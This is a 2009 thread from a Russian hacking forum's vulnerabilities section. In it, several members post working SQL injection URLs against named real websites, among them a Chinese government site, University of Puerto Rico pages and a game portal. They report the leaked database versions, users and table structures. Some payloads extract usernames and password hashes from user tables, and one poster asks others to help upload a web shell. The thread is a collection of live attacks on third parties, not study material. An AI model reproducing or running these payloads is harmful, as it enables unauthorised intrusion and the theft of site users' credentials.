HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.08.2009, 20:48
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
По умолчанию

Код:
http://stihoslov.ru/view.php?id=-39657+union+select+1,2,3,user_loginname,user_password,6,7,8,9,10,11,12%20FROM%20e107_user%20LIMIT%201,1+--+


Код:
http://www.gaztrubplast.ru/news/news1.php?id=-1+union+select+1,2,user%28%29,database%28%29,5,6,version%28%29+--+

version: 4.0.27
database: gaztrub
user: gaztrub@zvm16

Последний раз редактировалось ZARO; 29.08.2009 в 21:20..
 
Ответить с цитированием

  #2  
Старый 29.08.2009, 22:42
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
По умолчанию

integrand.nl PR=8!!!!
http://www.integrand.nl/vestigingen-links.php?id=1/**/anD/**/1=-1/**/uniON/**/aLl/**/seLeCT/**/1,version(),3,4,5,6,user(),8,9,null+--+/*
version - 5.0.51a-community-nt
user - integrand.nl@localhost
database - integrand
Tables
forumusers
cms_users (username, password, email)

Последний раз редактировалось [x60]unu; 30.08.2009 в 09:44..
 
Ответить с цитированием

  #3  
Старый 29.08.2009, 23:11
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Код:
http://www.hotellepriori.com/index.php?productId=1+union+select+concat(0x3,version(),user(),database())+limit+1,1
5.0.51a-3ubuntu5.4weblogik@localhostsite_lepriori

(вывод в исходнике)

Код:
http://www.dontpaniconline.com/designthepack/theme/?t=1+union+select+concat(0x3,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+limit+1,1/*
5.0.45db12781@localhostdb12781_designaposter

Последний раз редактировалось Swift; 29.08.2009 в 23:37..
 
Ответить с цитированием

  #4  
Старый 30.08.2009, 00:22
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://www.sarkrolik.ru/biblioteka.php?mode=bib&id=-30+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9--
4.1.22-log:rabbits@localhost:rabbits

ТИЦ: 10
PR: 3




Код:
http://www.paragrafen.no/?id=-30+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
4.1.22-logaragrafen@uw01-php4.sysedata.noaragrafen

PR: 5
 
Ответить с цитированием

  #5  
Старый 30.08.2009, 01:16
diGriz
Участник форума
Регистрация: 11.10.2006
Сообщений: 134
Провел на форуме:
3607644

Репутация: 235
По умолчанию

[PR=5]
Код:
http://artecapital.net/rockgallery/index.php?id=-8+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6--
artecap_artecapital:5.0.81-community:artecap_arteadmi@localhost

[PR=3]
Странный сайт...
Код:
http://www.punk4dummies.com/interviews.php?id=-20+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8--
db213786537:5.0.45-log:dbo213786537@212.227.114.173
 
Ответить с цитированием

  #6  
Старый 30.08.2009, 11:32
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Код:
http://www.hjzf.gov.cn/admin/attachment.php?attachmentid=1+union+select+1,2,concat(0x3,version(),database(),user()),4,5,6/*
4.0.27-logsite_hjgovsite_hjgov@localhost
 
Ответить с цитированием

  #7  
Старый 30.08.2009, 12:28
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
По умолчанию

Цитата:
_ttp://www.2bike.ru/moto.php?id=-7+union+select+1,group_concat(table_name),3+from+I NFORMATION_SCHEMA.TABLES+where+table_schema+not+in +('information_schema')--
obzor,obzor1

Последний раз редактировалось DrAssault; 30.08.2009 в 12:38..
 
Ответить с цитированием

  #8  
Старый 30.08.2009, 13:32
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

PR 6
http://home.uprm.edu/hrjobs/showjob.php?id=-330'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,24/*

Database Version: 4.1.12-log
Database name: hrjobs
User name: rea@home3.uprm.edu

---------------------------------------------------------------------------------------------------------------

PR 5
http://ing.uprm.edu/events2.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,10/*

Database Version: 4.1.12-log
Database name: pagina_decanato
User name: decainge@admin.uprm.edu

------------------------------------------------------------------------------------------------------------------------

PR 5
http://oiip.uprm.edu/building.php?id=-132'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,31/*

Database Version: 4.1.12-log
Database name: reabuilding
User name: oiip@admin.uprm.edu
 
Ответить с цитированием

  #9  
Старый 30.08.2009, 15:26
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
Arrow

Топ серверов lineage.
http://l2.kiktours.com

Зарегестрированые пользыватели:
PHP код:
http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a,name,pass),mail+from+l2portal.users-- 
Зарегестрированые сервера:
PHP код:
http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a3a3a3a3a,user,web),server_type+from+l2portal.servers-- 
Вся БД: (Там БД от нескольких сайтов...)
PHP код:
http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a,TABLE_SCHEMA,TABLE_NAME),2+from+INFORMATION_SCHEMA.COLUMNS-- 
Если у когото получится залить шелл, плиз ПМ.
 
Ответить с цитированием

  #10  
Старый 30.08.2009, 18:06
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
По умолчанию

http://www.t-fisi.de/links.php?id=1+anD+1=-1+union+select+1,0,version()
Version = 5.0.51a-24+lenny1
User = web1@localhost
Database = usr_web1_1

Columns: Table bb1_users
Код:
username
	password
	email
	userposts
	groupid
	rankid
	title
	regdate
	lastvisit
	lastactivity
	usertext
	signature
	icq
	aim
	yim
	msn
	homepage
	birthday
	avatarid
	gender
	showemail
	admincanemail
	usercanemail
	invisible
	usecookies
	styleid
	activation
	blocked
	daysprune
	timezoneoffset
	startweek
	dateformat
	timeformat
	emailnotify
	buddylist
	ignorelist
	receivepm
	emailonpm
	pmpopup
	umaxposts
	showsignatures
	showavatars
	showimages
	nosessionhash
	ratingcount
	ratingpoints
	threadview
Columns: Table wp_users
Код:
user_login
	user_pass
	user_nicename
	user_email
	user_url
	user_registered
	user_activation_key
	user_status
	display_name

Последний раз редактировалось [x60]unu; 30.08.2009 в 18:47..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.